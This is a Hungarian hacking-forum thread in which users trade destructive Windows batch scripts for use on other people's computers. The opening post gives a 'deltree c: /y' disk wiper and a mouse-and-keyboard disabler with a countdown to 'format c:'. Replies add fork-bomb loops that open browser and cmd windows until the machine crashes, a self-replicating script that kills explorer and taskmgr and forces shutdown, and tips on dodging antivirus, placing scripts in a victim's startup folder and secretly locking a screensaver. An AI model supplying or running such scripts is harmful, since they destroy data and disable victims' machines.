Jump to content
PirateClub.hu

A Nagy Batch Tema (Otletek IDE)


struc©
 Share

Recommended Posts

Helo'

 

Ez a topic csak un. Spoiler-ek osszessege, mivel ha egessz script-eket irunk azzal x jogot sertunk.

Vegulis akkor ESSUNK NEKI:::

------------------------------------------------------------------------------------------------------------------------------

A .bat file-rol:::

 

 

1. Ezt egy sima Notepad-ban is lehet irni... vis Start->Run->Notepad.exe

 

2. A megirt file-t a Notepad-ban mikor mentjuk el a kiterjesztest at kell irni .bat -ra

3. A virusirtok nem ismerik fel viruskent (meg ha az is, kivetel a NOD32)

4. Nehany tipusu parancshoz Admin jogok szuksegesek

------------------------------------------------------------------------------------------------------------------------------

 

Batch szotar(parancsok):::

 

 

@echo off

--->>> Nem irja ki h milyen parancsokat hajt vegre a progi

 

 

Cls

--->>>(cls=clear last sentence) torli az utolso mondatot...

 

Start www.azenoldalam.aholakarom

--->>> megnyitja azt az oldalt, de lehet aplikaciot is, pl. winamp.exe

 

Goto function1

--->>> a function1 -hez iranyit

 

Del (+attributumok, ker engedelyt, nem ker engedelyt, stb...) xy.exe

--->>> Torles

 

Shutdown (+attributumok, ker engedelyt, nem ker engedelyt, stb...)

--->>> Szamitogep kikapcsolasa

 

Format c:

--->>> ez magaert beszel(leformazza a kivant meghajtot), termeszetesen kellenek parameterek pl.: Rakerdezes

 

Echo "Ribizli"

--->>> kiiratja a szot

 

Copy H:autoexec.bat C:

--->>> masolas (H-rol C-re az autoexec.bat fajlt)

--------------------------------------------------------------------------------------------------------------------------------

 

Egyenlore ennyi eleg...gyerunk inkabb a gyakorlati reszre:::

A legtobb hacker/ rosszakaronk egy virus script-et a kovetkezokeppen fog megirni ->

 

@echo off 
           cls
           deltree c:  /y

--->>> ezzel a 3soros script-tel letorli barmilyen rakerdezes nelkul a C: particiot

 

Egy kevesbe szadista probalkozas:::

@echo off
           cls
           RunDll32 MOUSE, Disable
           RunDll32 KEYBOARD, Disable
           cls
           echo "Nyomj meg egy gombot ha nem vagy homokos!"
           pause

--->>> kikapcsolja az egeret, billentyuzetet, es keri h nyomjunk le egy gombot, es termeszetesen nemtudunk :P es utana varatjuk a progit... de itt lehetne hasznalni a fantaziankat es betenni egy allitast miszerint ha nemnyomunk meg semmit formazza a c-t vagy torolje a fokonyvtarat: -> lesz egy input valtozo (x masodperc) es azt betesszuk countdown-modba vis szamoljon vissza

echo "Meg %input% masodperc es formazom a c:-t" --->>> if %input%=0 es ha nem lett billentyu lenyomva format c: vagy deltree c:* /y

--->>> van egy nagy hatranya(X-el ki lehet lepni a programbol:(

 

Gyerekek hasznaljatok a kreativitasotokat...

Kezdetnek ennyi, varom a ti otleteiteket is :P

 

Ezen virusok, vagy gyanus fajlok ellen a legjobb vedekezes::: megnyitjuk Notepad-ban mint .txt fajlt es meglatjuk a progi tartalmat :P

 

-------------------------------------------------------------------

=====================================

Leci egesz script-eket ne irjatok, mert x jogot sert :)

 

UI:Esetleg elvarok egy Koszonom-ot :rolleyes:

Link to comment
Share on other sites

  • Replies 73
  • Created
  • Last Reply

Top Posters In This Topic

Kösz :) klasszak, de nyugodtan írhatsz még, mert azon kívül h összemixelem őket, új nem jut eszembe :D

Jah és az ameik lekapcsolja a billenytyűzetet és egeret, az nem működött :(

 

Viszont van egy ötlet, oat lehet h megfordítja az egér irányát? Tod ha jobbra húzom balra megy :)

Link to comment
Share on other sites

azt a bill. egér kikapcsolósat nem engedi elmenteni,trójainak érzékeli(nod 32),és automatikusan kitörli.mit leeht ez ellen tenni?

ha ezt belerakom : RunDll32 MOUSE, Disable ,akkor már trójainak érzékeli,ha azt kihagyom,akkor meg nem működik,nem kapcsolja ki a bill.-t,de aztán kiírja azt a homokos hülyeséget,de a bill. normálisan megy.

 

u.i.:scorpicore ötlete nekem is teccik

Link to comment
Share on other sites

Sztem addigra kapcsold kia NOD-ot míg megnézed, jobbat nem tok mondani :mellow:

Új ötlet: Oat lehet csinálni h minden gombra vmi rendszerezköszt elindít?

pl.:

Enter-->Paint

Space-->Számológép

Shift-->Word

 

Vagy van még 1, oat lehet csinálni h ha valamit megakarsz nyitni, akkor azt 10x nyitja meg?

Link to comment
Share on other sites

Hat nekem Kaspersky-m van es siman engedi a RunDll32 Keyboard,Disable-t, de ott is lehet a bibi, h lehet h nem talalja vis nem tud mit kikapcsolni...

 

Vis nezz szet a Windows/System32 -ben es keress keyboard- fajlt, es lehet h olyan lesz h keyboard.drv --->>> ebbol kiolyolag a parancs::: RunDrv(nemtom h kell e a 32) keyboard, Disable

 

remelem segitett :P

Link to comment
Share on other sites

Új ötlet: Oat lehet csinálni h minden gombra vmi rendszerezköszt elindít?

...

 

Probald ki igy:::

 

@echo off
title Made By Vegeta_man111
:start
cls
echo Hello! Ready to have some fun?
pause
cls
echo Choose what you would like to do....
echo 1. Parancssor
echo 2. Kilepes a progibol!
echo 3. Kilepes a Windows-bol!
echo.
set /p valasztas=Mit szeretnel csinalni?:
if %valasztas% == 1 goto valasztas1
if %valasztas% == 2 goto valasztas2
if %valasztas% == 2 goto valasztas3
cls
:valasztas1
cls
cmd.exe
goto valasztas
:valsztas2
cls
set /p kilepes=Ki akarsz lepni a programbol? (y or n):
if %kilepes% == y goto end
if %kilepes% == n goto valasztas
:end
echo THx hogy hasznaltad a progim!
pause>nul
exit
:valasztas3
cls
Echo Shutdown....
pause
cls
shutdown -s

 

De lehet pl. Notepad-ot is nyitni notepad.exe, sok sikert es kiratast

remelem segitettem :P

 

 

 

Link to comment
Share on other sites

Vagy van még 1, oat lehet csinálni h ha valamit megakarsz nyitni, akkor azt 10x nyitja meg?

 

Hat meg szep, de mi volna ha nem tizszer hanem naon sokszor :D:P

 

@echo off
title repeat
cls
echo Udv a kis REPEAT progimban!
:ciklus
start www.google.com
goto :ciklus

 

Na ez a kis progi kinyitja a google-t egyparszor, amig le nem fagy a gep... :P

 

 

Link to comment
Share on other sites

a többit is próbáltam,de valahogy nem akarnak menni.Az megy ,h megnyit valamilyen oldalt.Az,h valamit töröljön az nem megy(oda akármilyen .exe filet írhatok ,ami bene van a gépembe???)plz írd le azt konkrétan,úgy ,h nekem már csak az exe-t keljen kicsrélni,de úgy ,h kérdezés nélköl törölje.az se megy,amikor a szöveget írja ki(ribizli),felugrik 1mp-re az ablak,de aztán el is tünik,pedik ugyan úgy másoltam oda ,ahogy te írtad. A c törlését meg nem próbáltam,azt majd később valaki másnak a gépeén. :D

Link to comment
Share on other sites

a többit is próbáltam,de valahogy nem akarnak menni.Az megy ,h megnyit valamilyen oldalt.Az,h valamit töröljön az nem megy(oda akármilyen .exe filet írhatok ,ami bene van a gépembe???)plz írd le azt konkrétan,úgy ,h nekem már csak az exe-t keljen kicsrélni,de úgy ,h kérdezés nélköl törölje.az se megy,amikor a szöveget írja ki(ribizli),felugrik 1mp-re az ablak,de aztán el is tünik,pedik ugyan úgy másoltam oda ,ahogy te írtad. A c törlését meg nem próbáltam,azt majd később valaki másnak a gépeén. :D

 

hatha azt akarod h ne csak kiugorjon a szoveg altalabanegy fel mp-re kesleltesd a progit (pause)

a Del-ek nem mennek ha nem talalja a fajlokat, vis a pontos eleresi utvonal szukseges h torolni tudjon :(

 

remelem menni fog :)

Link to comment
Share on other sites

Nah Strucc, ez a Mass Nyitogatós progi működött :D viszont azt az egereset megtod valósítani amit az elején írtam?

 

 

En a helyetekben nem weboldalak hanem pl. aplikacio elkinditasat eroltetnem mer' attol sokkal hamarabb kidol a gep...

 

Apropo, arra az egeres dologra meg nem jottem ra, de bakker ez disznosag h csak en gondolkozok, hol vannak ilyenkor nagy programatorok, meg hackerek? <_< <_<

sztem a megoldas vhol::: Control Panel -> Mouse -> ott kattintsatok az eszkozokre (egerre) azon belul a DRIVER-re es ott lathatjatok h hova is nyul Windows bacsi ha egeret hasznaltok, na ha azt megbuheraljatok problema megoldva vis: megnyitjatok Notepad-ban, atirjatok es a batch programban pedig parancsnak adtok egy copy-t a,mivel atirjatok az eredeti fajlt

 

Jo 'szorakozast!' :P

Link to comment
Share on other sites

Jólvan :) jelenleg ezen a téren te vagy itt a főfejes :)

 

Viszont van egy új ötlet: monitort lekapcsolja? :D sztem ez mókás :D

Gondolom valahogy úgylenne ahogy a billentyűzetet kapcsolná le csak helyette mást kell beírni, csak azt nem tom monitornál is ien eccerű-e? a másik meg h a billentyűzet lekapcsolás se vált be nállam sajna :(

 

Én levágtam nagyjából amit Strucc írt, csak kicsit túl mélyre nyúl le a dolog :D és (bár nem hiszem h oat tudna okozni, de) nem lenne kedvem windows újra pakolni egy apró baki miatt :)

Link to comment
Share on other sites

Huha az a monitoros dolog sztem lehetetelen, esetleg ha vki dob egy tippet h merre isen elindulni, mer' elvileg a monitorok plug&play elven mukodnek, vis nem lehet progival kikapcsolni, habar van vmi beallitas a ScreenSaver-nel azt esetleg felhasznalni...

De van itt egy zsivany huzas...

-->> RegMon-nal vagy FileMon-nal megnezni h milyen x fajlokhoz nyul az Xp mikor a screen saver-re heslot raksz es azt atirni... vis lefuttatnank a progit es nem is sejtenenk h a screensaverunk mar jelsoval vedett, azt ma' csak megtetozzuk ha atirjuk a varakozasi idot a kepernyokimelesre...

 

Scorpicore: kiutni nemtudod a windows-ot amig nem trukalsz a system file-okhoz, vagy egyszeruen csinalj egy backupot amit utana esetleg elo tucc huzni :P

 

Kösz ez naon faxa!

De nem megy!Megcsinálom a xy.batot megnytom bevillan a z ablak és kilép!

Mi lehet a gond?

 

Sztem nem jo parancsokat adtal meg vagy egyszeruen csak syntax error...

 

sokat nem fogtam fel belőle XD.nem nagyon értek az ilyenekhez.nem lehetne,hogy te leírod,h hogyan kell beírni Notepadba?add meg az MSN címed plz

 

Hat siman eloveszed a notepad-ot megirod ah ott van (copy-paste is lehet) es mikor mented el: Save As kozmi.bat a lenyeg...

Nincs MSN-em :(

 

Apropo nem leszek gepnel a heten, mer' Szlovakia egy k.a orszag <_< majd hetvegen jovok. addigis jo szorakozast! :P

Link to comment
Share on other sites

kis segédanyag:

 

https://www.netacademia.net/publikacio/cikk/doc/0305cmdline.doc
http://x3.hu/freeweb/frameset.x3?user=/thewarenavigator&page=/batchprogramming1.html
http://indykfi.phys.klte.hu/kisfiz/MT/dos/dosalap.htm
http://www.zotyo.hu/emil-pld.htm

 

:)

Link to comment
Share on other sites

ezzel az a baj hogy ugy szeretném megcsinálni hogy nekem ne keljen ott lenni a gépelöt....

 

Vis mas gepebe akarod betenni mint inditofajlt??? ;)

 

Apropo Scorpicore... probaltad mar kombinalni, pl.:::

@echo off
title cmd
cls
echo WritteN by_strucc
:ciklus1
start cmd.exe
goto :ciklus2
:ciklus2
start http://google.com
goto :ciklus1

Ezzel elered h sokkal hamarabb akadjon ki a gep, mivel a cmd.exe mas platformot hiv, mint a 32bites win32 platformra tervezett explorer/firefox... :P

Link to comment
Share on other sites

ahamm:):P

 

és itt benne van az inditopultban?:P

amúgy találtam egy jót:P

ezt próbáljátok ki:D

 

::Fire::

@echo off

echo. tskill taskmgr > task.bat

echo copy task.bat task.bat >> task.bat

echo start task.bat >> task.bat

shutdown -s -t 50

tskill explorer

tskill taskmgr

:task

start task.bat

goto task

 

de azért válaszolj hogy benne van-e az inditopultban......és azt megtudnád csinálni hogy valahogyan beleszerkezted abba amit én irtam hogy mindig inditopultban legyen ...?:lol::P

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Hozzászólás a témához...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Jelenleg olvassa   0 members

    • No registered users viewing this page.



×
×
  • Create New...